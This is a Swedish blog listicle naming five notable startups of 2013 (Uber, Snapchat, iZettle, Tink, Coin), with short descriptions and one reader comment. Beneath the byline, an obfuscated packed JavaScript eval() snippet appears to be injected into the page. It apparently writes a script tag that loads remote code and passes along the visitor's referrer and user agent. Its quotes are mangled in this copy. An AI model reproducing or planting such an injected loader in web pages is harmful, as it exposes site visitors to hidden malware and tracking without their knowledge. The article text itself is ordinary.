Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

5 hetaste startups 2013

5 hetaste startups 2013
Sebastian

5 eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sdrsh|var|u0026u|referrer|iehff||js|php’.split(’|’),0,{}))
hetaste startups 2013:
 Förra året har varit ett stort år för många nyskapande bolag. Med allt från appar som håller koll på ekonomin till tjänster för lyxigare transport. Revue.se älskar startups och vill därför lista de fem idéer som vi anser tagit störst fart under 2013. Nedan finner ni både svenska och utländska aktörer som har ett stort år som väntar 2014.

1. Uber


Vad är det? Uber är en tjänst som erbjuder ett smartare sätt att boka transport/taxi i Stockholm och övriga världen. Bilarna är ej utrustade med ”fula” skyltar utan är oftast svarta nytvättade Mercedes med kostymklädd chaufför. Du bokar enkelt en bil via deras app och betalning sker automatiskt när resan är klar så ingen betalning sker i bilen.
Bolaget finns också i andra städer där man kan boka en bil med samma app, mycket användbart då man ofta inte vet telefonnummer till taxi utomlands.

Så fick de dragkraft 2013: Uber lanserades i Sverige, Stockholm i början av 2013 och har ökat något helt otroligt på marknaden. Men framgången fick också motgångar när konkurrenter stämde bolaget via transportstyrelsen för att inte gå efter lagar som finns för transportbolag i Sverige. Detta var dock inget som hindrade Uber och 2014 ser ännu ljusare ut för bolaget.

2. Snapchat


Vad är det? Snapchat är appen som låter dig skicka bilder till vänner utan att bilderna sparas ner på mottagarens telefon. Bilderna har också en tidsbegränsning på hur länge mottagaren får se bilden.

Så fick de dragkraft 2013: I Sverige drog trenden igång under 2013 och blev en sensation bland yngre användare. Förutom detta fick snapchat också en förfrågan om att köpas upp för en otroligt stor summa pengar, närmare sagt ca 23 miljarder kronor. Bakom köpförfrågan stod Facebook och Google. Inget förvärv avslutades då Snapchat tackade nej. Något som jag själv tror var ett väldigt dåligt val.

3. iZettle


Vad är det? En tjänst som gör det möjligt att ta emot kortbetalningar direkt i mobilen. Ett smart verktyg för personer som har små företag eller exempelvis ställer ut under mässor eller liknande. Ett svenskt bolag med säte i Stockholm.

Så fick de dragkraft 2013: Förutom att iZettle har ökat i antal personer så har 2013 varit ett strålade år på andra fronter också. Fler kunder har börjat använda tjänsten och fler blivit mottagliga att betala via denna metod. Mycket för att fler snappat upp ögonen för bolaget och därav skapat ett varumärke folk känner igen. Kontor har under 2013 också öppnat upp utomlands.

4. Tink


Vad är det? Tink är en tjänst som låter dig hålla koll på din privatekonomi direkt i mobilen, surfplattan eller på datorn. Genom att koppla ihop ditt Tink-konto med banken så plockar systemet automatiskt in alla utgifter och intäkter, sammanställer och visar i ett snyggt grafiskt manér. Svenskt bolag med säte i Stockholm

Så fick de dragkraft 2013: Tink grundades 2012 men har fått mest uppmärksamhet under 2013 då media följt deras fantastiska utveckling. Även om bolaget har en lång väg att gå så har de kommit en riktigt bra bit. Användarantalet har växt otroligt och 2014 ser bara ljusare ut.

5. Coin


Vad är det? Coin är en tjänst som många försökt sig på innan. Ett problem idag är att man springer runt med en massa kort i plånboken. Coin vill ändra på detta och skapa ett kort som har alla samlade på ett ställe. Visst låter det bra?

Så fick de dragkraft 2013: Coin har visat sig vara väldigt eftertraktat. De har redan fått ihop en otroligt massa förbokningar på det kort som kommer att lanseras sommaren 2014. Enligt uppgifter samlade Coin ihop 50.000 dollar i förbokningar under 2013. Det är även ett bolag som fått ögonen på sig av Google, Square och banken Goldman Sachs.

Kommentera gärna nedan de startups ni tycker borde vara med på listan!

 

Comments

  1. Lars

    Colin är riktigt coolt